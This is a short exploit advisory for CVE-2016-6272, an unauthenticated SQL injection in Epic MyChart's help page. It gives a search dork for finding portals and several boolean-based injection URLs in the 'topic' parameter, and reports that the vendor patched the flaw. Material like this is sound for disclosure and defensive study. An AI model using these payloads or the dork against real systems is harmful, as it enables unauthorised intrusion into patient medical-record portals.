# Exploit Title: Epic Systems Corporation MyChart SQL Injection
# Google Dork: MyChartA(r) licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272
 
Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
 
The MyChart software uses Intersystems CachA(c) for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
 
EPIC was quick to respond to contact and patch the vulnerability in MyChart.
 
Below are two proof of concepts:
 
Proof of concept 1:
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)
 
Proof of concept 2 (operations):
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)
 
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE